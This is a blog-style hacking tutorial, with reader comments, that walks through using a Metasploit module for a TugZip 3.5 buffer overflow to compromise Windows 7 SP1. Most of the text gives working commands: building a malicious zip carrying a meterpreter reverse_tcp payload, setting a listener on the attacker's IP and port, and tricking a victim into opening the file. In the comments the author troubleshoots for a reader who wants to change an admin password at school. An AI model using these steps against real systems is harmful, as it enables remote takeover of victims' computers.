• 26,769
  • +1,026
  • 3,010
Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)

Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows 7 SP1

Tested Vulnerable Application : TugZip 3.5

Exploit Credit : Stefan Marin, Lincoln, TecR0c, mr_me

This Hacking Windows 7 SP1 I wrote after surfing around metasploit and then found this exploit :-).

According to metasploit.com about this exploit :

This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.

Don't wait too long, let's try this in your personal lab by using virtual machine.

Requirements :

1. TugZip 3.5

Download from Mediafire.com

2. TugZip Exploit (download link)

Mediafire.com

3. Metasploit Framework

Step By Step :

Attacker IP Address : 192.168.8.93

Victim IP Address : 192.168.8.91

1. Download TugZip from the mediafire link above and install it in victim computer(testing purposes)

2. Open Metasploit console by running msfconsole command and then update it first using msfupdate command to update the library. If you didn't have internet connection to update the library, you can download the exploit above and then put it in /pentest/exploits/framework/modules/exploit/windows/fileformat/

Use the exploit and then set up the payload(see picture below)

Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)

3. The next step you need to configure the needed switch in this exploit to match your needs. To view all available switch just run show options command.

Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)

Info :

set filename h0T-clipS.zip --> set up your desired filename for the malicious file

set lhost 192.168.8.93 --> set up the local address to connect back to payload when exploit successfully triggered

set lport 443 --> our local port to receive connection from victim

exploit --> generate the malicious file with payload

/root/.msf4/data/exploits/h0T-clipS.zip --> the malicious file stored in this location

4. The next step we need to set up a listener to handle reverse connection from our exploit(if it's successfully triggered)

Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)

Info :

use exploit/multi/handler --> set up handler to handle connection to our machine

set payload/windows/meterpreter/reverse_tcp --> make this same with the payload we've already been set up above

set lhost 192.168.8.93 --> make this same with the ip we've already been set up above

set lport 443 --> make this same with the local port we've already been set up above

exploit --> start listen for incoming connection

5. After everything has been set up, we need to send the malicious file in step 3 to victim and make sure victim opened that file. After victim opened our malicious file, our metasploit console will have an active session of victim system.

Hacking Windows 7 Ultimate via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday)

Pwn3D!!

Countermeasures :

1. Until I'm wrote this tutorial(2011-10-15) the status still zeroday a.k.a no cure.

Hope it's useful 🙂

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Manvir

    Hi i opened the file with tugzip and it crashed tugzip but my virtual machine backtrack doesnt have any session opened it still shows starting the payload handler
    please help

    • v4L

      #Manvir
      Where did you try the exploit?windows version?

  • Manvir

    windows 7 sp1 home premium
    i am running backtrack in virtualbox inside this windows 7 box.
    please  help i have to use an exploit in windows 7 to change admin password for my school project. i understand the concept but i cant wrap my head around finding the vulnerability i can exploit.

    • v4L

      #Manvir
      Hmm actually I didn’t know the details of your problem, but sometimes the problem can happen if there’s a firewall inside the box that alerting about packet in and packet out from the machine.

  • Artrex

    Hello! my friend i can not find this file /root/.msf4/data/exploits/h0T-clipS.zip

    • v4L

      #Artrex
      did you already run the exploit command?